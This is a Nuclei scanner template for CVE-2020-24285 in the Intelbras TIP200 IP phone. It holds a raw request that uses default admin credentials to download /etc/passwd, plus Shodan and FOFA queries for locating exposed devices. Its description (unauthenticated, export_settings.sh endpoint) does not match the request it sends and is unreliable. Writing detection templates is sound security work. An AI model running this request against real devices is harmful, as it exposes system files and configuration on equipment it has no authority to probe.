INTELBRAS TELEFONE IP TIP200 version 60.61.75.22 is vulnerable to information disclosure, allowing unauthenticated attackers to access sensitive device information and configuration data via a direct request to the /cgi-bin/export_settings.sh endpoint.
PoC代码[已公开]
id: CVE-2020-24285
info:
name: INTELBRAS TELEFONE IP TIP200 60.61.75.22 - Local File Inclusion
author: ritikchaddha
severity: high
description: |
INTELBRAS TELEFONE IP TIP200 version 60.61.75.22 is vulnerable to information disclosure, allowing unauthenticated attackers to access sensitive device information and configuration data via a direct request to the /cgi-bin/export_settings.sh endpoint.
remediation: |
Update the device firmware to the latest version provided by INTELBRAS.
reference:
- https://github.com/SecLoop/CVE/blob/main/telefone_ip_tip200.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-24285
classification:
cve-id: CVE-2020-24285
cwe-id: CWE-200
epss-score: 0.13052
epss-percentile: 0.93841
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
metadata:
vendor: intelbras
product: tip200
max-request: 1
verified: true
shodan-query: html:"/cgi-bin/cgiServer.exx"
fofa-query: body="/cgi-bin/cgiServer.exx"
tags: cve,cve2020,intelbras,telefone,tip200,exposure,lfi,vuln
variables:
username: "admin"
password: "admin"
http:
- raw:
- |
GET /cgi-bin/cgiServer.exx?download=/etc/passwd HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}
skip-variables-check: true
matchers:
- type: dsl
dsl:
- "contains_all(tolower(header), 'application/octet-stream', 'filename=')"
- "regex('root:.*:0:0:', body)"
- "status_code == 200"
condition: and
# digest: 4b0a00483046022100f4a208bf3da6d7256c7ac4bf1da75a7efd8dbf534735551c89a837c4a032b9d1022100ef51102422f9b34cfe0a623b782cb04f712317f25915de18812dc962f738ced8:922c64590222798bb761d5b6d8e72950